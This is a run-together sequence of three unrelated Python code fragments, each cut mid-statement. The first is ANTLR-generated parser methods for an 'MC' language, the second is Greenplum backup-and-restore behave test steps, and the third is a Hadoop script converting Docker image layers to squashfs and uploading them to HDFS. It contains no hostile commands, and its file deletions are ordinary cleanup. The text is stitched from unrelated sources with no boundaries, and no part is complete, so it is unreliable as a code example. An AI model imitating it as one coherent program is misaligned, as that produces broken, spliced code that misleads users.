self.getTypedRuleContexts(MCParser.Var_declareContext) else: return self.getTypedRuleContext(MCParser.Var_declareContext,i) def func_declare(self, i:int=None): if i is None: return self.getTypedRuleContexts(MCParser.Func_declareContext) else: return self.getTypedRuleContext(MCParser.Func_declareContext,i) def getRuleIndex(self): return MCParser.RULE_program def program(self): localctx = MCParser.ProgramContext(self, self._ctx, self.state) self.enterRule(localctx, 0, self.RULE_program) self._la = 0 # Token type try: self.enterOuterAlt(localctx, 1) self.state = 68 self._errHandler.sync(self) _la = self._input.LA(1) while True: self.state = 68 self._errHandler.sync(self) la_ = self._interp.adaptivePredict(self._input,0,self._ctx) if la_ == 1: self.state = 66 self.var_declare() pass elif la_ == 2: self.state = 67 self.func_declare() pass self.state = 70 self._errHandler.sync(self) _la = self._input.LA(1) if not ((((_la) & ~0x3f) == 0 and ((1 << _la) & ((1 << MCParser.BOOLEANTYPE) | (1 << MCParser.INTTYPE) | (1 << MCParser.FLOATTYPE) | (1 << MCParser.STRINGTYPE) | (1 << MCParser.VOIDTYPE))) != 0)): break self.state = 72 self.match(MCParser.EOF) except RecognitionException as re: localctx.exception = re self._errHandler.reportError(self, re) self._errHandler.recover(self, re) finally: self.exitRule() return localctx class Var_declareContext(ParserRuleContext): def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1): super().__init__(parent, invokingState) self.parser = parser def prim_type(self): return self.getTypedRuleContext(MCParser.Prim_typeContext,0) def varlist(self): return self.getTypedRuleContext(MCParser.VarlistContext,0) def SEMI(self): return self.getToken(MCParser.SEMI, 0) def getRuleIndex(self): return MCParser.RULE_var_declare def var_declare(self): localctx = 
MCParser.Var_declareContext(self, self._ctx, self.state) self.enterRule(localctx, 2, self.RULE_var_declare) try: self.enterOuterAlt(localctx, 1) self.state = 74 self.prim_type() self.state = 75 self.varlist() self.state = 76 self.match(MCParser.SEMI) except RecognitionException as re: localctx.exception = re self._errHandler.reportError(self, re) self._errHandler.recover(self, re) finally: self.exitRule() return localctx class Prim_typeContext(ParserRuleContext): def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1): super().__init__(parent, invokingState) self.parser = parser def BOOLEANTYPE(self): return self.getToken(MCParser.BOOLEANTYPE, 0) def INTTYPE(self): return self.getToken(MCParser.INTTYPE, 0) def FLOATTYPE(self): return self.getToken(MCParser.FLOATTYPE, 0) def STRINGTYPE(self): return self.getToken(MCParser.STRINGTYPE, 0) def getRuleIndex(self): return MCParser.RULE_prim_type def prim_type(self): localctx = MCParser.Prim_typeContext(self, self._ctx, self.state) self.enterRule(localctx, 4, self.RULE_prim_type) self._la = 0 # Token type try: self.enterOuterAlt(localctx, 1) self.state = 78 _la = self._input.LA(1) if not((((_la) & ~0x3f) == 0 and ((1 << _la) & ((1 << MCParser.BOOLEANTYPE) | (1 << MCParser.INTTYPE) | (1 << MCParser.FLOATTYPE) | (1 << MCParser.STRINGTYPE))) != 0)): self._errHandler.recoverInline(self) else: self._errHandler.reportMatch(self) self.consume() except RecognitionException as re: localctx.exception = re self._errHandler.reportError(self, re) self._errHandler.recover(self, re) finally: self.exitRule() return localctx class VarlistContext(ParserRuleContext): def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1): super().__init__(parent, invokingState) self.parser = parser def var(self): return self.getTypedRuleContext(MCParser.VarContext,0) def COMA(self, i:int=None): if i is None: return self.getTokens(MCParser.COMA) else: return self.getToken(MCParser.COMA, i) def varlist(self, i:int=None): if i is None: return self.getTypedRuleContexts(MCParser.VarlistContext) else: return self.getTypedRuleContext(MCParser.VarlistContext,i) def getRuleIndex(self): return MCParser.RULE_varlist def varlist(self): localctx = MCParser.VarlistContext(self, self._ctx, self.state) self.enterRule(localctx, 6, self.RULE_varlist) try: self.enterOuterAlt(localctx, 1) self.state = 80 self.var() self.state = 85 self._errHandler.sync(self) _alt = self._interp.adaptivePredict(self._input,2,self._ctx) while _alt!=2 and _alt!=ATN.INVALID_ALT_NUMBER: if _alt==1: self.state = 81 self.match(MCParser.COMA) self.state = 82 self.varlist() self.state = 87 self._errHandler.sync(self) _alt = self._interp.adaptivePredict(self._input,2,self._ctx) except RecognitionException as re: localctx.exception = re self._errHandler.reportError(self, re) self._errHandler.recover(self, re) finally: self.exitRule() return localctx class VarContext(ParserRuleContext): def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1): super().__init__(parent, invokingState) self.parser = parser def ID(self): return self.getToken(MCParser.ID, 0) def LSB(self): return self.getToken(MCParser.LSB, 0) def INTLIT(self): return self.getToken(MCParser.INTLIT, 0) def RSB(self): return self.getToken(MCParser.RSB, 0) def getRuleIndex(self): return MCParser.RULE_var def var(self): localctx = MCParser.VarContext(self, self._ctx, self.state) self.enterRule(localctx, 8, self.RULE_var) self._la = 0 # Token type try: self.enterOuterAlt(localctx, 1) self.state = 88 
self.match(MCParser.ID) self.state = 92 self._errHandler.sync(self) _la = self._input.LA(1) if _la==MCParser.LSB: self.state = 89 self.match(MCParser.LSB) self.state = 90 self.match(MCParser.INTLIT) self.state = 91 self.match(MCParser.RSB) except RecognitionException as re: localctx.exception = re self._errHandler.reportError(self, re) self._errHandler.recover(self, re) finally: self.exitRule() return localctx class Func_declareContext(ParserRuleContext): def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1): super().__init__(parent, invokingState) self.parser = parser def func_type(self): return self.getTypedRuleContext(MCParser.Func_typeContext,0) def ID(self): return self.getToken(MCParser.ID, 0) def LB(self): return self.getToken(MCParser.LB, 0) def RB(self): return self.getToken(MCParser.RB, 0) def blockstmt(self): return self.getTypedRuleContext(MCParser.BlockstmtContext,0) def paralist(self): return self.getTypedRuleContext(MCParser.ParalistContext,0) def getRuleIndex(self): return MCParser.RULE_func_declare def func_declare(self): localctx = MCParser.Func_declareContext(self, self._ctx, self.state) self.enterRule(localctx, 10, self.RULE_func_declare) self._la = 0 # Token type try: self.enterOuterAlt(localctx, 1) self.state = 94 self.func_type() self.state = 95 self.match(MCParser.ID) self.state = 96 self.match(MCParser.LB) self.state = 98 self._errHandler.sync(self) _la = self._input.LA(1) if (((_la) & ~0x3f) == 0 and ((1 << _la) & ((1 << MCParser.BOOLEANTYPE) | (1 << MCParser.INTTYPE) | (1 << MCParser.FLOATTYPE) | (1 << MCParser.STRINGTYPE))) != 0): self.state = 97 self.paralist() self.state = 100 self.match(MCParser.RB) self.state = 101 self.blockstmt() except RecognitionException as re: localctx.exception = re self._errHandler.reportError(self, re) self._errHandler.recover(self, re) finally: self.exitRule() return localctx class Func_typeContext(ParserRuleContext): def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1): super().__init__(parent, invokingState) self.parser = parser def prim_type(self): return self.getTypedRuleContext(MCParser.Prim_typeContext,0) def arraytype(self): return self.getTypedRuleContext(MCParser.ArraytypeContext,0) def VOIDTYPE(self): return self.getToken(MCParser.VOIDTYPE, 0) def getRuleIndex(self): return MCParser.RULE_func_type def func_type(self): localctx = MCParser.Func_typeContext(self, self._ctx, self.state) self.enterRule(localctx, 12, self.RULE_func_type) try: self.state = 106 self._errHandler.sync(self) la_ = self._interp.adaptivePredict(self._input,5,self._ctx) if la_ == 1: self.enterOuterAlt(localctx, 1) self.state = 103 self.prim_type() pass elif la_ == 2: self.enterOuterAlt(localctx, 2) self.state = 104 self.arraytype() pass elif la_ == 3: self.enterOuterAlt(localctx, 3) self.state = 105 self.match(MCParser.VOIDTYPE) pass except
context.full_backup_timestamp dir = "%s/db_dumps/%s" % (path, context.backup_subdir) cleanup_cmd = "rm -f %s/%s" % (dir, file_pattern) run_command(context, cleanup_cmd) if context.exception: raise context.exception @given('there are no backup files') @then('there are no backup files') @when('there are no backup files') def impl(context): cleanup_backup_files(context, 'template1') @given('the backup files in "{location}" are deleted') @when('the backup files in "{location}" are deleted') @then('the backup files in "{location}" are deleted') def impl(context, location): cleanup_backup_files(context, 'template1', location) @then('there are no report files in the master data directory') def impl(context): cleanup_report_files(context, master_data_dir) @when('verify that partitioned tables "{table_list}" in "{dbname}" has {num_parts} empty partitions') @then('verify that partitioned tables "{table_list}" in "{dbname}" has {num_parts} empty partitions') def impl(context, table_list, dbname, num_parts): expected_num_parts = int(num_parts.strip()) tables = [t.strip() for t in table_list.split(',')] for t in tables: check_x_empty_parts(dbname, t, expected_num_parts) @given('a backup file of tables "{table_list}" in "{dbname}" exists for validation') @when('a backup file of tables "{table_list}" in "{dbname}" exists for validation') @then('a backup file of tables "{table_list}" in "{dbname}" exists for validation') def impl(context, table_list, dbname): tables = [t.strip() for t in table_list.split(',')] for t in tables: backup_data(context, t.strip(), dbname) @when( 'verify that there is a table "{tablename}" of "{tabletype}" type in "{dbname}" with same data as table "{backedup_table}"') @then( 'verify that there is a table "{tablename}" of "{tabletype}" type in "{dbname}" with same data as table "{backedup_table}"') def impl(context, tablename, tabletype, dbname, backedup_table): if not check_table_exists(context, dbname=dbname, table_name=tablename, table_type=tabletype): raise Exception("Table '%s' does not exist when it should" % tablename) validate_restore_data(context, tablename, dbname, backedup_table) @when('check that there is a "{table_type}" table "{tablename}" in "{dbname}" with same data from "{backedup_dbname}"') @then('check that there is a "{table_type}" table "{tablename}" in "{dbname}" with same data from "{backedup_dbname}"') def impl(context, table_type, tablename, dbname, backedup_dbname): if not check_table_exists(context, dbname=dbname, table_name=tablename, table_type=table_type): raise Exception("Table '%s' does not exist when it should" % tablename) validate_restore_data(context, tablename, dbname, None, backedup_dbname) @when('verify that there is a "{table_type}" table "{tablename}" in "{dbname}" with data') @then('verify that there is a "{table_type}" table "{tablename}" in "{dbname}" with data') def impl(context, table_type, tablename, dbname): if not check_table_exists(context, dbname=dbname, table_name=tablename, table_type=table_type): raise Exception("Table '%s' does not exist when it should" % tablename) validate_restore_data(context, tablename, dbname) @given('schema "{schema_list}" exists in "{dbname}"') @then('schema "{schema_list}" exists in "{dbname}"') def impl(context, schema_list, dbname): schemas = [s.strip() for s in schema_list.split(',')] for s in schemas: drop_schema_if_exists(context, s.strip(), dbname) create_schema(context, s.strip(), dbname) @then('the temporary file "{filename}" is removed') def impl(context, filename): if 
os.path.exists(filename): os.remove(filename) @then('the temporary table file "{filename}" is removed') def impl(context, filename): table_file = 'test/behave/mgmt_utils/steps/data/gptransfer/%s' % filename if os.path.exists(table_file): os.remove(table_file) def create_table_file_locally(context, filename, table_list, location=os.getcwd()): tables = table_list.split('|') file_path = os.path.join(location, filename) with open(file_path, 'w') as fp: for t in tables: fp.write(t + '\n') context.filename = file_path @given('there is a file "{filename}" with tables "{table_list}"') @then('there is a file "{filename}" with tables "{table_list}"') def impl(context, filename, table_list): create_table_file_locally(context, filename, table_list) @given('there is a fake pg_aoseg table named "{table}" in "{dbname}"') def impl(context, table, dbname): create_fake_pg_aoseg_table(context, table, dbname) def verify_file_contents(context, file_type, file_dir, text_find, should_contain=True): if len(file_dir.strip()) == 0: file_dir = master_data_dir if not hasattr(context, "dump_prefix"): context.dump_prefix = '' if file_type == 'pg_dump_log': fn = 'pg_dump_log' context.backup_timestamp = '0' elif file_type == 'report': fn = '%sgp_dump_%s.rpt' % (context.dump_prefix, context.backup_timestamp) elif file_type == 'status': fn = '%sgp_dump_status_*_1_%s' % (context.dump_prefix, context.backup_timestamp) elif file_type == 'filter': fn = '%sgp_dump_%s_filter' % (context.dump_prefix, context.backup_timestamp) elif file_type == "statistics": fn = '%sgp_statistics_*_1_%s' % (context.dump_prefix, context.backup_timestamp) elif file_type == 'schema': fn = '%sgp_dump_%s_schema' % (context.dump_prefix, context.backup_timestamp) elif file_type == 'cdatabase': fn = '%sgp_cdatabase_*_1_%s' % (context.dump_prefix, context.backup_timestamp) elif file_type == 'dump': fn = '%sgp_dump_*_1_%s.gz' % (context.dump_prefix, context.backup_timestamp) subdirectory = context.backup_timestamp[0:8] if file_type == 'pg_dump_log': full_path = os.path.join(file_dir, fn) else: full_path = glob.glob(os.path.join(file_dir, 'db_dumps', subdirectory, fn))[0] if not os.path.isfile(full_path): raise Exception("Can not find %s file: %s" % (file_type, full_path)) contents = "" if file_type == 'dump': fd = gzip.open(full_path) else: fd = open(full_path) contents = fd.read() fd.close() if should_contain and not text_find in contents: raise Exception("Did not find '%s' in file %s" % (text_find, full_path)) elif not should_contain and text_find in contents: raise Exception("Found '%s' in file '%s'" % (text_find, full_path)) @then('verify that the "{file_type}" file in "{file_dir}" dir contains "{text_find}"') def impl(context, file_type, file_dir, text_find): verify_file_contents(context, file_type, file_dir, text_find) @then('verify that the "{file_type}" file in "{file_dir}" dir does not contain "{text_find}"') def impl(context, file_type, file_dir, text_find): verify_file_contents(context, file_type, file_dir, text_find, should_contain=False) @then('the timestamp in the report file should be same as timestamp key') def impl(context): if not hasattr(context, 'timestamp_key'): raise Exception('Unable to find timestamp key in context') if hasattr(context, 'backup_dir'): report_file = os.path.join(context.backup_dir, 'db_dumps', '%s' % (context.timestamp_key[0:8]), 'gp_dump_%s.rpt' % context.timestamp_key) else: report_file = os.path.join(master_data_dir, 'db_dumps', '%s' % (context.timestamp_key[0:8]), 'gp_dump_%s.rpt' % context.timestamp_key) with 
open(report_file) as rpt: for line in rpt: if line.startswith('Timestamp Key'): timestamp_key = line.split(':')[-1].strip() if timestamp_key != context.timestamp_key: raise Exception('Expected timestamp key to be %s, but found %s in report file %s' % ( context.timestamp_key, timestamp_key, report_file)) @then('there should be dump files with filename having timestamp key in "{dbname}"') def impl(context, dbname): if not hasattr(context, 'timestamp_key'): raise Exception('Unable to find timestamp key in context') master_hostname = get_master_hostname(dbname) results = get_hosts_and_datadirs(dbname) for (host, datadir) in results: if host == master_hostname: if hasattr(context, 'backup_dir'): dump_dir = os.path.join(context.backup_dir, 'db_dumps', '%s' % (context.timestamp_key[0:8])) else: dump_dir = os.path.join(master_data_dir, 'db_dumps', '%s' % (context.timestamp_key[0:8])) master_dump_files = ['%s/gp_dump_-1_1_%s' % (dump_dir, context.timestamp_key), '%s/gp_dump_status_-1_1_%s' % (dump_dir, context.timestamp_key), '%s/gp_cdatabase_-1_1_%s' % (dump_dir, context.timestamp_key), '%s/gp_dump_-1_1_%s_post_data' % (dump_dir, context.timestamp_key)] for dump_file in master_dump_files: cmd = Command('check for dump files', 'ls -1 %s | wc -l' % (dump_file)) cmd.run(validateAfter=True) if int(cmd.get_stdout()) != 1: raise Exception('Dump file %s not found after gp_dump on host %s' % (dump_file, host)) else: if hasattr(context, 'backup_dir'): dump_dir = os.path.join(context.backup_dir, 'db_dumps', '%s' % (context.timestamp_key[0:8])) else: dump_dir = os.path.join(datadir, 'db_dumps', '%s' % (context.timestamp_key[0:8])) segment_dump_files = ['%s/gp_dump_*_*_%s' % (dump_dir, context.timestamp_key), '%s/gp_dump_status_*_*_%s' % (dump_dir, context.timestamp_key)] for dump_file in segment_dump_files: cmd = Command('check for dump files', 'ls -1 %s | wc -l' % (dump_file), ctxt=REMOTE, remoteHost=host) cmd.run(validateAfter=True) if int(cmd.get_stdout()) != 1: raise Exception('Dump file %s not found after gp_dump on host %s' % (dump_file, host)) @then('"{filetype}" file should not be created under "{dir}"') def impl(context, filetype, dir): if not hasattr(context, 'backup_timestamp'): raise Exception('Unable to find out the %s because backup timestamp has not been stored' % filetype) if filetype == "dirty_list": filename = 'gp_dump_%s_dirty_list' % context.backup_timestamp elif filetype == "plan": filename = 'gp_restore_%s_plan' % context.backup_timestamp elif filetype == 'pipes': filename = 'gp_dump_%s_pipes' % context.backup_timestamp elif filetype == 'regular_files': filename = 'gp_dump_%s_regular_files' % context.backup_timestamp else: raise Exception("Unknown filetype '%s' specified" % filetype) dump_dir = dir if len(dir.strip()) != 0 else master_data_dir file_path = os.path.join(dump_dir, 'db_dumps', context.backup_timestamp[0:8], filename) if os.path.exists(file_path): raise Exception("File path %s should not exist for filetype '%s'" % (file_path, filetype)) def get_plan_filename(context): filename = 'gp_restore_%s_plan' % context.backup_timestamp return os.path.join(master_data_dir, 'db_dumps', context.backup_timestamp[0:8], filename) def get_dirty_list_filename(context, backup_dir=None): if not backup_dir: backup_dir = master_data_dir if not hasattr(context, "dump_prefix"): context.dump_prefix = '' filename = '%sgp_dump_%s_dirty_list' % (context.dump_prefix, context.backup_timestamp) return os.path.join(backup_dir, 'db_dumps', context.backup_timestamp[0:8], filename) @then('plan file should 
match "{filename}"') def impl(context, filename): current_path = os.path.realpath(__file__) current_dir = os.path.dirname(current_path) golden_filename = "%s/%s" % (current_dir, filename) generated_filename = get_plan_filename(context) diff_files(golden_filename, generated_filename) def parse_plan_file(filename): plan = {} with open(filename) as fd: for line in fd: parts = line.partition(":") ts = parts[0].strip() if ts not in plan: plan[ts] = set() tables = parts[2].split(",") for t in tables: if t not in plan[ts]: plan[ts].add(t.strip()) return plan def modify_plan_with_labels(context, expected_plan, scenario_number=""): labels_key = 'timestamp_labels' + scenario_number newplan = {} for k in expected_plan: if k not in global_labels[labels_key]: raise Exception("Label '%s' not specified in behave test" % k) ts = global_labels[labels_key][k] newplan[ts] = expected_plan[k] return newplan def compare_plans(expected, actual): expected_keys = expected.keys() actual_keys = actual.keys() if len(expected_keys) != len(actual_keys): raise Exception( "Expected plan has %s timestamps actual plan has %s timestamps" % (len(expected_keys), len(actual_keys))) for k in expected: if k not in actual: raise Exception("Expected timestamp in plan and did not find it: %s " % k) expected_tables = sorted(expected[k]) actual_tables = sorted(actual[k]) if expected_tables != actual_tables: print "Expected plan: %s" % expected print "Actual plan: %s" % actual raise Exception("Tables in plan for timestamp '%s' do not match expected tables" % k) @then('the plan file is validated against "{expected_plan}"') def impl(context, expected_plan): context.restore_plan = parse_plan_file(get_plan_filename(context)) current_path = os.path.realpath(__file__) current_dir = os.path.dirname(current_path) expected_file = '%s/%s' % (current_dir, expected_plan) expected_plan = parse_plan_file(expected_file) expected_plan = modify_plan_with_labels(context,
tags: comment = ', '.join(map(str, value[1])) if comment > 0: comment = "#" + comment file_contents.append(tags + ":" + manifest_hash + comment + "\n") file_contents.sort() with open(image_tag_to_hash, 'w') as file_pointer: for val in file_contents: file_pointer.write(val) def update_dicts_for_multiple_tags(hash_to_tags, tag_to_hash, tags, manifest_hash, comment): for tag in tags: update_dicts(hash_to_tags, tag_to_hash, tag, manifest_hash, comment) def update_dicts(hash_to_tags, tag_to_hash, tag, manifest_hash, comment): remove_tag_from_dicts(hash_to_tags, tag_to_hash, tag) add_tag_to_dicts(hash_to_tags, tag_to_hash, tag, manifest_hash, comment) def remove_from_dicts(hash_to_tags, tag_to_hash, tags): for tag in tags: logging.debug("removing tag: %s", tag) remove_tag_from_dicts(hash_to_tags, tag_to_hash, tag) def populate_tag_dicts(hdfs_root, image_tag_to_hash, local_image_tag_to_hash): if does_hdfs_entry_exist(hdfs_root + "/" + image_tag_to_hash): hdfs_get(hdfs_root + "/" + image_tag_to_hash, local_image_tag_to_hash) image_tag_to_hash_hash = calculate_file_hash(local_image_tag_to_hash) else: image_tag_to_hash_hash = 0 if image_tag_to_hash_hash != 0: hash_to_tags, tag_to_hash = read_image_tag_to_hash(local_image_tag_to_hash) else: hash_to_tags = {} tag_to_hash = {} return hash_to_tags, tag_to_hash, image_tag_to_hash_hash def setup_squashfs_hdfs_dirs(hdfs_dirs, image_tag_to_hash_path): logging.debug("Setting up squashfs hdfs_dirs: %s", str(hdfs_dirs)) setup_hdfs_dirs(hdfs_dirs) if not does_hdfs_entry_exist(image_tag_to_hash_path, raise_on_error=False): hdfs_touchz(image_tag_to_hash_path) hdfs_chmod("755", image_tag_to_hash_path) def skopeo_copy_image(pull_format, image, skopeo_format, skopeo_dir): logging.info("Pulling image: %s", image) if os.path.isdir(skopeo_dir): raise Exception("Skopeo output directory already exists. " + "Please delete and try again " + "Directory: " + skopeo_dir) pull_fmt_string = get_pull_fmt_string(pull_format) shell_command(["skopeo", "copy", pull_fmt_string + image, skopeo_format + ":" + skopeo_dir], False, True, True, 600) def untar_layer(tmp_dir, layer_path): shell_command(["tar", "-C", tmp_dir, "--xattrs", "--xattrs-include='*'", "-xf", layer_path], False, True, True, 600) def tar_file_search(archive, target): out, err, returncode = shell_command(["tar", "-xf", archive, target, "-O"], False, False, False, 600) return out def set_fattr(directory): shell_command(["setfattr", "-n", "trusted.overlay.opaque", "-v", "y", directory], False, True, True) def make_whiteout_block_device(file_path, whiteout): shell_command(["mknod", "-m", "000", file_path, "c", "0", "0"], False, True, True) out, err, returncode = shell_command(["stat", "-c", "%U:%G", whiteout], False, True, True) perms = str(out).strip() shell_command(["chown", perms, file_path], False, True, True) def convert_oci_whiteouts(tmp_dir): out, err, returncode = shell_command(["find", tmp_dir, "-name", ".wh.*"], False, False, True, 60) whiteouts = str(out).splitlines() for whiteout in whiteouts: if whiteout == 0: continue basename = os.path.basename(whiteout) directory = os.path.dirname(whiteout) if basename == ".wh..wh..opq": set_fattr(directory) else: whiteout_string = ".wh." 
idx = basename.rfind(whiteout_string) bname = basename[idx+len(whiteout_string):] file_path = os.path.join(directory, bname) make_whiteout_block_device(file_path, whiteout) shell_command(["rm", whiteout], False, True, True) def dir_to_squashfs(tmp_dir, squash_path): shell_command(["/usr/sbin/mksquashfs", tmp_dir, squash_path, "-write-queue", "4096", "-read-queue", "4096", "-fragment-queue", "4096"], False, True, True, 600) def upload_to_hdfs(file_path, file_name, hdfs_dir, replication, mode, force=False): dest = hdfs_dir + "/" + file_name if does_hdfs_entry_exist(dest, raise_on_error=False): if not force: logging.warn("Not uploading to HDFS. File already exists: %s", dest) return logging.info("File already exists, but overwriting due to force option: %s", dest) hdfs_put(file_path, dest, force) hdfs_setrep(replication, dest) hdfs_chmod(mode, dest) logging.info("Uploaded file %s with replication %d and permissions %s", dest, replication, mode) def atomic_upload_mv_to_hdfs(file_path, file_name, hdfs_dir, replication, image_tag_to_hash_file_hash): global HADOOP_PREFIX local_hash = calculate_file_hash(file_path) if local_hash == image_tag_to_hash_file_hash: logging.info("image_tag_to_hash file unchanged. Not uploading") return tmp_file_name = file_name + ".tmp" hdfs_tmp_path = hdfs_dir + "/" + tmp_file_name hdfs_file_path = hdfs_dir + "/" + file_name try: if does_hdfs_entry_exist(hdfs_tmp_path, raise_on_error=False): hdfs_rm(hdfs_tmp_path) hdfs_put(file_path, hdfs_tmp_path) hdfs_setrep(replication, hdfs_tmp_path) hdfs_chmod("444", hdfs_tmp_path) jar_path = HADOOP_PREFIX + "/share/hadoop/tools/lib/hadoop-extras-*.jar" jar_file = None for file in glob.glob(jar_path): jar_file = file if not jar_file: raise Exception("SymlinkTool Jar doesn't exist: %s" % (jar_path)) logging.debug("jar_file: " + jar_file) shell_command(["hadoop", "jar", jar_file, "org.apache.hadoop.tools.SymlinkTool", "mvlink", "-f", hdfs_tmp_path, hdfs_file_path], False, False, True) except: if does_hdfs_entry_exist(hdfs_tmp_path, raise_on_error=False): hdfs_rm(hdfs_tmp_path) raise Exception("image tag to hash file upload failed") def docker_to_squash(layer_dir, layer, working_dir): tmp_dir = os.path.join(working_dir, "expand_archive_" + layer) layer_path = os.path.join(layer_dir, layer) squash_path = layer_path + ".sqsh" if os.path.isdir(tmp_dir): raise Exception("tmp_dir already exists. 
Please delete and try again " + "Directory: " + tmp_dir) os.makedirs(tmp_dir) try: untar_layer(tmp_dir, layer_path) convert_oci_whiteouts(tmp_dir) dir_to_squashfs(tmp_dir, squash_path) finally: os.remove(layer_path) shell_command(["rm", "-rf", tmp_dir], False, True, True) def check_image_for_magic_file(magic_file, skopeo_dir, layers): magic_file_absolute = magic_file.strip("/") logging.debug("Searching for magic file %s", magic_file_absolute) for layer in layers: ret = tar_file_search(os.path.join(skopeo_dir, layer), magic_file_absolute) if ret: logging.debug("Found magic file %s in layer %s", magic_file_absolute, layer) logging.debug("Magic file %s has contents:\n%s", magic_file_absolute, ret) return ret raise Exception("Magic file %s doesn't exist in any layer" % (magic_file_absolute)) def pull_build_push_update(args): skopeo_format = args.skopeo_format pull_format = args.pull_format hdfs_root = args.hdfs_root image_tag_to_hash = args.image_tag_to_hash replication = args.replication force = args.force images_and_tags = args.images_and_tags check_magic_file = args.check_magic_file magic_file = args.magic_file bootstrap = args.bootstrap hdfs_layers_dir = hdfs_root + "/layers" hdfs_config_dir = hdfs_root + "/config" hdfs_manifest_dir = hdfs_root + "/manifests" working_dir = None try: working_dir = get_working_dir(args.working_dir) local_image_tag_to_hash = os.path.join(working_dir, os.path.basename(image_tag_to_hash)) if bootstrap: hdfs_dirs = [hdfs_root, hdfs_layers_dir, hdfs_config_dir, hdfs_manifest_dir] image_tag_to_hash_path = hdfs_root + "/" + image_tag_to_hash setup_squashfs_hdfs_dirs(hdfs_dirs, image_tag_to_hash_path) hash_to_tags, tag_to_hash, image_tag_to_hash_hash = populate_tag_dicts(hdfs_root, image_tag_to_hash, local_image_tag_to_hash) for image_and_tag_arg in images_and_tags: image, tags = split_image_and_tag(image_and_tag_arg) if not image or not tags: raise Exception("Positional parameter requires an image and at least 1 tag: " + image_and_tag_arg) logging.info("Working on image %s with tags %s", image, str(tags)) manifest, manifest_hash = get_manifest_from_docker_image(pull_format, image) layers = get_layer_hashes_from_manifest(manifest) config_hash = get_config_hash_from_manifest(manifest) logging.debug("Layers: %s", str(layers)) logging.debug("Config: %s", str(config_hash)) update_dicts_for_multiple_tags(hash_to_tags, tag_to_hash, tags, manifest_hash, image) all_layers_exist = True if not does_hdfs_entry_exist(hdfs_manifest_dir + "/" + manifest_hash, raise_on_error=False): all_layers_exist = False if not does_hdfs_entry_exist(hdfs_config_dir + "/" + config_hash, raise_on_error=False): all_layers_exist = False for layer in layers: hdfs_squash_path = hdfs_layers_dir + "/" + layer + ".sqsh" if not does_hdfs_entry_exist(hdfs_squash_path, raise_on_error=False): all_layers_exist = False break if all_layers_exist: if not force: logging.info("All layers exist in HDFS, skipping this image") continue logging.info("All layers exist in HDFS, but force option set, so overwriting image") skopeo_dir = os.path.join(working_dir, image.split("/")[-1]) logging.debug("skopeo_dir: %s", skopeo_dir) skopeo_copy_image(pull_format, image, skopeo_format, skopeo_dir) if check_magic_file: check_image_for_magic_file(magic_file, skopeo_dir, layers) for layer in layers: logging.info("Squashifying and uploading layer: %s", layer) hdfs_squash_path = hdfs_layers_dir + "/" + layer + ".sqsh" if does_hdfs_entry_exist(hdfs_squash_path, raise_on_error=False): if force: logging.info("Layer already exists, but 
overwriting due to force" + "option: %s", layer) else: logging.info("Layer exists. Skipping and not squashifying or" + "uploading: %s", layer) continue docker_to_squash(skopeo_dir, layer, working_dir) squash_path = os.path.join(skopeo_dir, layer + ".sqsh") squash_name = os.path.basename(squash_path) upload_to_hdfs(squash_path, squash_name, hdfs_layers_dir, replication, "444", force) config_local_path = os.path.join(skopeo_dir, config_hash) upload_to_hdfs(config_local_path, os.path.basename(config_local_path), hdfs_config_dir, replication, "444", force) manifest_local_path = os.path.join(skopeo_dir, "manifest.json") upload_to_hdfs(manifest_local_path, manifest_hash, hdfs_manifest_dir, replication, "444", force) write_local_image_tag_to_hash(local_image_tag_to_hash, hash_to_tags) atomic_upload_mv_to_hdfs(local_image_tag_to_hash, image_tag_to_hash, hdfs_root, replication, image_tag_to_hash_hash) finally: if working_dir: if os.path.isdir(working_dir): shell_command(["rm", "-rf", working_dir], False, True, True) def pull_build(args): skopeo_format = args.skopeo_format pull_format = args.pull_format images_and_tags = args.images_and_tags check_magic_file = args.check_magic_file magic_file = args.magic_file for image_and_tag_arg in images_and_tags: image, tags = split_image_and_tag(image_and_tag_arg) if not image or not tags: raise Exception("Positional parameter requires an image and at least 1 tag: " + image_and_tag_arg) logging.info("Working on image %s with tags %s", image, str(tags)) manifest, manifest_hash = get_manifest_from_docker_image(pull_format, image) layers = get_layer_hashes_from_manifest(manifest) config_hash = get_config_hash_from_manifest(manifest) logging.debug("Layers: %s", str(layers)) logging.debug("Config: %s", str(config_hash)) try: working_dir = get_working_dir(args.working_dir) skopeo_dir = os.path.join(working_dir, image.split("/")[-1]) logging.debug("skopeo_dir: %s", skopeo_dir) skopeo_copy_image(pull_format, image, skopeo_format, skopeo_dir) if check_magic_file: check_image_for_magic_file(magic_file, skopeo_dir, layers) for layer in layers: logging.info("Squashifying layer: %s", layer) docker_to_squash(skopeo_dir, layer, working_dir) except: if os.path.isdir(skopeo_dir): shutil.rmtree(skopeo_dir) raise def push_update(args): hdfs_root = args.hdfs_root image_tag_to_hash = args.image_tag_to_hash replication = args.replication force = args.force images_and_tags = args.images_and_tags bootstrap = args.bootstrap hdfs_layers_dir = hdfs_root + "/layers" hdfs_config_dir = hdfs_root + "/config" hdfs_manifest_dir = hdfs_root + "/manifests" local_image_tag_to_hash = None try: working_dir = get_working_dir(args.working_dir) local_image_tag_to_hash = os.path.join(working_dir, os.path.basename(image_tag_to_hash)) if bootstrap: hdfs_dirs = [hdfs_root, hdfs_layers_dir, hdfs_config_dir, hdfs_manifest_dir] image_tag_to_hash_path = hdfs_root + "/" + image_tag_to_hash setup_squashfs_hdfs_dirs(hdfs_dirs, image_tag_to_hash_path) hash_to_tags, tag_to_hash, image_tag_to_hash_hash = populate_tag_dicts(hdfs_root, image_tag_to_hash, local_image_tag_to_hash) for image_and_tag_arg in images_and_tags: image, tags = split_image_and_tag(image_and_tag_arg) if not image or not tags: raise Exception("Positional parameter requires an image and at least 1 tag: " + image_and_tag_arg) logging.info("Working on image %s with tags %s", image, str(tags)) skopeo_dir = os.path.join(working_dir, image.split("/")[-1]) if not os.path.exists(skopeo_dir): raise Exception("skopeo_dir doesn't exists: %s" % 
